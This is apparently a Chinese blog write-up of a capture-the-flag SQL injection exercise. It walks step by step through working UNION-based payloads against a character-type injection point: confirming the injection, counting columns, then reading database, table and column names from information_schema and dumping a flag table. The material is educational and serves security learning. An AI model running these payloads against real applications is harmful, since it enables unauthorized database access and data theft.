当前位置: 首页 > article >正文

2025.1.15——二、字符型注入

article 2025/1/16 10:22:36

一、基本操作:整理已知信息,本题为字符型注入

二、解题步骤

step 1:确认为字符型注入

键入:

1

键入:1' and 1=2 # 发现报错

键入:1' and 1=1 # 未发现报错

所以确认为字符型注入

step 2:查询字段

1' order by 4 #

1' order by 2 #

        确认字段数为2(省略了试探字段数为3的情况)

step 3:爆数据库名

1' and 1=2 union select database(),database() #

        得到两个数据库名均为sqli

step 4:爆表名

错误示范:

1' and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_name='sqli' #

错误原因:最后部分应该是 table_schema 而不是 table_name。通过指定table_schema='sqli',可以筛选出属于sqli这个数据库的所有表的名称。如果使用table_name,则需要知道具体的表名才能进行查询

正确payload:

1' and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli' #

得到表名分别为flag和news

step 5:爆列名

错误示范:

1' and 1=2 union select 1,group_concat(column_name)from information_schema.columns where table_name='sqli' and column_schema='flag' #

错误原因:这里的column_schema并不是information_schema.columns表中的有效字段。在information_schema.columns表中,用于指定数据库名的字段是table_schema,而不是column_schema。所以,这个查询中的条件column_schema='flag'是错误的,导致 SQL 语句无法正确执行,从而出现错误。

正确payload:

1' and 1=2 union select 1,group_concat(column_name)from information_schema.columns where table_name='flag' #

step 6:爆具体数据

1' and 1=2 union select 1,flag from sqli.flag #

三、小结

        与整数型注入流程大致相同,区别在于需要加上单引号进行语句闭合,最后还要加上#将SQL语句剩余部分注释掉


http://www.kler.cn/a/504867.html

相关文章:

  • 数据结构《MapSet哈希表》
  • 7.STM32F407ZGT6-RTC
  • HTML应用指南:利用GET请求获取星巴克门店数据
  • centos修改/etc/resolv.conf 重启network后又恢复到原来的状态
  • 通过外部化 `config.properties` 文件更换数据库配置
  • NLP三大特征抽取器:CNN、RNN与Transformer全面解析
  • STM32 物联网智能家居 (三) 输入子系统
  • 语言月赛 202407【significance】题解(AC)
  • Web_HTML+CSS_First_Asignment
  • C#对动态加载的DLL进行依赖注入,并对DLL注入服务
  • 前端组件开发:组件开发 / 定义配置 / 配置驱动开发 / 爬虫配置 / 组件V2.0 / form表单 / table表单
  • linux 端口转发工具rinetd
  • Flask安全开发
  • 亚洲科技创新之夜即将闪耀CES Asia 2025首日
  • 网络安全测评质量管理与标准解读
  • Tmux复制时将内容传递到系统剪贴板
  • vue2 web 多标签输入框 elinput是否当前焦点
  • C++ 数据结构:基本概念、时间复杂度、空间复杂度
  • YOLOv9改进,YOLOv9自研检测头融合HAttention用于图像修复的混合注意力检测头
  • Leetcode 474. 一和零 多重背包问题,动态规划
  • QT 键值对集合QMap
  • 【WEB】网络传输中的信息安全 - 加密、签名、数字证书与HTTPS
  • 标准通上线标准「全文检索」功能,提升查询精准度!
  • Android控件底色蓝色无法修改、高版本无法安装app、找不到xml、找不到java文件、目录不显示等问题
  • windows下编译php源码
  • 基于PyQt - 6的医疗多模态大模型医疗研究系统中的创新构建与应用(上 .文章部分)